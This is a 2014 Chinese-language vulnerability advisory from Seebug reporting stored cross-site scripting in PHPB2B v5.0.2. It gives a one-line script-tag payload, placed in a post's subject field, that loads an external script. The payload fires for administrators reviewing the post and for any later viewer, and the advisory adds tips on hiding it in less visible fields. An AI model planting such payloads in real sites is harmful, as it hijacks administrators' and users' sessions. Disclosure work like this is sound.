PHPB2B存储型跨站(可打管理员和任意用户)

2014-06-16T00:00:00
ID SSV:95135
Type seebug
Reporter Root
Modified 2014-06-16T00:00:00

Description

简要描述:

PHPB2B v5.0.2对字段过滤不严格导致存储型跨站,可嵌入任意脚本文件,攻击管理员和任意用户。

详细说明:

1、phpB2B对用户发布供求信息模块,没有进行有效过滤,存在漏洞的字段包括主题、包装说明、价格说明等等。攻击者可以插入恶意代码,后台管理员审核用户供求信息时,漏洞触发,审核过程中,管理员并不会发现任何恶意代码,审核一旦成功,其它任何用户浏览供求信息时,便会触发漏洞。 通杀所有浏览器。

漏洞证明:

1、以发布供求信息主题字段为例进行说明。 2、用户进入商务室进行发布供求信息 3、在主题字段嵌入如下恶意代码: <script src=http://127.0.0.1/eXploit.js></script>

<img src="https://images.seebug.org/upload/201406/1610144097bec3d7f50f509aae18903b686629d1.png" alt="phpb2b1.png" width="600" onerror="javascript:errimg(this);">

4、管理员审核用户供求信息,进入审核页面时,漏洞便可触发:

<img src="https://images.seebug.org/upload/201406/161015597d0c3e71c2377e1ada1d5d0faa3ee611.png" alt="phpb2b2.png" width="600" onerror="javascript:errimg(this);">

5、查看页面源代码,成功嵌入恶意脚本

<img src="https://images.seebug.org/upload/201406/161016497732236007d371cbab4ec22aca9be7a6.png" alt="phpb2b3.png" width="600" onerror="javascript:errimg(this);">

6、审核通过,其它用户浏览供求信息,漏洞触发

<img src="https://images.seebug.org/upload/201406/16101735c29607f4481a1577b84624bbf50c1f2c.png" alt="phpb2b4.png" width="600" onerror="javascript:errimg(this);">

7、查看页面源代码,成功嵌入恶意脚本

<img src="https://images.seebug.org/upload/201406/16101834199c013e1abc1eae9a8d92f3b54d18bb.png" alt="phpb2b5.png" width="600" onerror="javascript:errimg(this);">

利用主题字段,我们可以更好的攻击系统管理员,为了更好的隐藏恶意代码,我们可以适当增加主题字段长度,当然我们可以利用其它字段进行攻击,其它字段对恶意代码的隐藏性更好,管理员应该完全注意不到恶意代码的存在,例如包装说明等字段,这样审核通过后,我们便可攻击其它任意用户,此处便不再详细说明